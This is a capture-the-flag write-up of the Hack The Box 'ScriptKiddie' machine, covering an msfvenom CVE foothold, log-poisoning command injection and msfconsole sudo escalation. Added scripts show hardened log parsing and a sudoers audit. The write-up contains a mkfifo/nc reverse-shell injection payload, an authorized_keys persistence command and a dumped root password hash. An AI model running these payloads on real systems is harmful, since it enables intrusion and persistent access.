Jack Cyber-security graduate student interested in researching privacy and security issues.

Hack The Box - Script Kiddie [Easy Linux]

ScriptKiddie

Overview

This easy Linux machine starts off with a CVE in msfvenom: sending a crafted input to the server's payload generator gives us a foothold. From there we notice a file, scanlosers.sh, with insecure logic that we can abuse to gain control of a second user on the box. Finally, as the pwn user we have sudo privileges to run Metasploit (msfconsole), which easily drops into a root shell.

  • Starting off with an nmap scan against all ports
  • SSH is open and a web server is on port 5000 -> weird!

Going to this web server we can see that a "script kiddie" set up some tools that he could use. After trying multiple times to exploit the nmap and searchsploit inputs, I concluded that they were most likely not vulnerable and moved on to the payload generator.

Initial Thoughts: possible command injection, malicious file upload

Searching Online

Offensive Security’s Exploit Database Archive

exploit.py

echo "ssh-rsa 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 kali@kali" >> /home/kid/.ssh/authorized_keys

  • Get a bash shell through SSH by adding my public SSH key to the authorized_keys file

Enumeration

Seeing which users are on the box

  • This script takes the 3rd field of each line in a log and passes it to a shell command… hmmmmm

.test

a a ; /bin/bash -c '[[ -e "/tmp/z" ]] && rm -f "/tmp/z";mkfifo /tmp/z;cat /tmp/z | /bin/sh -i 2>&1 | nc 10.10.14.136 4443 > /tmp/z' #

Note the # at the end of the command. This is important so that anything appended after our input on the line is treated as a comment and will not execute or break our exploit.

#!/bin/bash
cat .test > /home/kid/logs/hackers
bash /home/pwn/scanlosers.sh

Above is a small bash script that copies the contents of .test into /home/kid/logs/hackers and then immediately calls scanlosers.sh.

Getting the pwn user to fire the script

  • If you put command injection into the searchsploit input on the web app, it will add your IP to /home/kid/logs/hackers

  • If you send a reverse shell in the third column and comment out the rest of the command, you can get a callback
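The root cause behind both the scanlosers.sh bullet above and the log-poisoning trick is the same: a field read from a log that anyone can write to is pasted into a command string and re-parsed by a shell. The script below is an added illustration, not the box's scanlosers.sh and not the author's code; it shows a constructed log-processing function with that defect beside a hardened version that validates the field as an IPv4 address and passes it as a single argument. The log lines and the `echo INJECTED` marker are constructed for the demo.

```sh
#!/bin/sh
# Added illustration (not the box's scanlosers.sh): a log-processing script that pastes an
# untrusted field into a shell command, beside a hardened version that validates the field
# and never re-parses it with a shell. The log lines below are constructed for the demo.

# Constructed sample log. By convention the third space-separated field is an IP address;
# the last line is the kind of entry an attacker can plant through the web app.
SAMPLE_LOG='2021-02-06 10:10:01 10.10.14.5
2021-02-06 10:11:42 10.10.14.7
2021-02-06 10:12:09 a ; echo INJECTED #'

# Vulnerable pattern: fields 3+ of each line are interpolated into a command string and
# handed to sh -c, so ';' and '#' in the log become shell syntax.
process_log_unsafe() {
    cut -d' ' -f3- "$1" | while IFS= read -r ip; do
        sh -c "echo scanning $ip"
    done
}

# Strict IPv4 check: only digits and dots, exactly four octets, each 0-255.
is_ipv4() {
    case "$1" in
        ''|*[!0-9.]*|.*|*.|*..*) return 1 ;;
    esac
    old_ifs=$IFS
    IFS=.
    set -- $1
    IFS=$old_ifs
    [ "$#" -eq 4 ] || return 1
    for octet in "$@"; do
        [ "$octet" -le 255 ] 2>/dev/null || return 1
    done
    return 0
}

# Hardened pattern: validate the field, then pass it as one argument so no shell ever
# parses attacker-controlled text; rejected entries are reported on stderr instead of run.
process_log_safe() {
    cut -d' ' -f3- "$1" | while IFS= read -r ip; do
        if is_ipv4 "$ip"; then
            printf 'scanning %s\n' "$ip"
        else
            printf 'rejected: %s\n' "$ip" >&2
        fi
    done
}

# Demo: write the constructed log to a temp file and process it both ways.
demo_log=$(mktemp)
printf '%s\n' "$SAMPLE_LOG" > "$demo_log"
echo '--- unsafe ---'
process_log_unsafe "$demo_log"
echo '--- hardened ---'
process_log_safe "$demo_log"
rm -f "$demo_log"
```

Running it prints `INJECTED` from the unsafe path and `rejected: a ; echo INJECTED #` on stderr from the hardened one. The fix is not quoting the variable inside `sh -c` (that still leaves the value under the shell's control) but dropping the inner shell entirely and allow-listing the field's format before use.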

Root priv-esc from pwn to root

The first thing I did was check whether we have sudo capabilities as the user pwn… turns out we do, and it's for msfconsole.

Since msfconsole can drop into a shell (and we can run it as root), you can see that we have the full abilities of root.
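The lesson for whoever wrote that sudo rule is that any program which can spawn a child shell or run arbitrary code is equivalent to granting a root shell. The audit script below is an added example, not from the writeup, that scans simple sudoers-style rules for such commands; the rule lines and the `/opt/msf/msfconsole` path are constructed placeholders, not the box's real configuration.

```sh
#!/bin/sh
# Added example (not from the writeup): audit simple sudoers rules for commands that can
# hand the caller an interactive shell, which is how a NOPASSWD msfconsole rule becomes
# root here. The rules and the /opt/msf path below are constructed placeholders.

SAMPLE_SUDOERS='# constructed sample rules
pwn ALL=(root) NOPASSWD: /opt/msf/msfconsole
backup ALL=(root) NOPASSWD: /usr/bin/rsync
www-data ALL=(root) NOPASSWD: /bin/systemctl restart nginx'

# Programs that can spawn a child shell or run arbitrary code once started
# (illustrative, not exhaustive): interactive consoles and interpreters.
SHELL_CAPABLE='msfconsole bash sh dash zsh python python3 perl ruby'

# Returns 0 when the basename of the command path in $1 is in SHELL_CAPABLE.
is_shell_capable() {
    name=${1##*/}
    for known in $SHELL_CAPABLE; do
        [ "$name" = "$known" ] && return 0
    done
    return 1
}

# Reads rules of the form "user host=(runas) [NOPASSWD:] /path/to/cmd [args]" on stdin,
# prints one line per rule whose command is shell-capable, and returns 0 if any was
# found (1 otherwise), so it can gate a configuration-management or CI check.
audit_sudoers() {
    found=1
    while IFS= read -r line; do
        case "$line" in ''|\#*) continue ;; esac
        user=${line%% *}
        spec=${line##*:}        # text after the last ':' is the command spec
        spec=${spec# }
        cmd=${spec%% *}
        if is_shell_capable "$cmd"; then
            printf '%s may run shell-capable command: %s\n' "$user" "$cmd"
            found=0
        fi
    done
    return $found
}

# Demo on the constructed rules; on a real host feed it the rule lines from
# /etc/sudoers or /etc/sudoers.d/* (only the single-command form above is parsed).
printf '%s\n' "$SAMPLE_SUDOERS" | audit_sudoers || echo 'no shell-capable sudo rules found'
```

The rsync and systemctl rules pass because their command basenames are not on the list; the pwn rule is flagged. The remediation is the usual one: grant the narrowest command and arguments the task needs, and never an interactive console.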

cat /etc/shadow

root:$6$RO4wVQ/hyXhjln4S$UQl5o6XSa2USqAM.RT9YwujFhZWriZqEz5We.opH1FLTbDtLfruET9jlKcEEqfxnCb1UxwhcfWJ/2gPJE77Bl.:18632:0:99999:7:::

Thoughts

Overall I thought this was a fun beginner box. It wasn't too difficult, yet it demonstrated good skills like pivoting, CVEs and understanding sudo privileges.

Rating: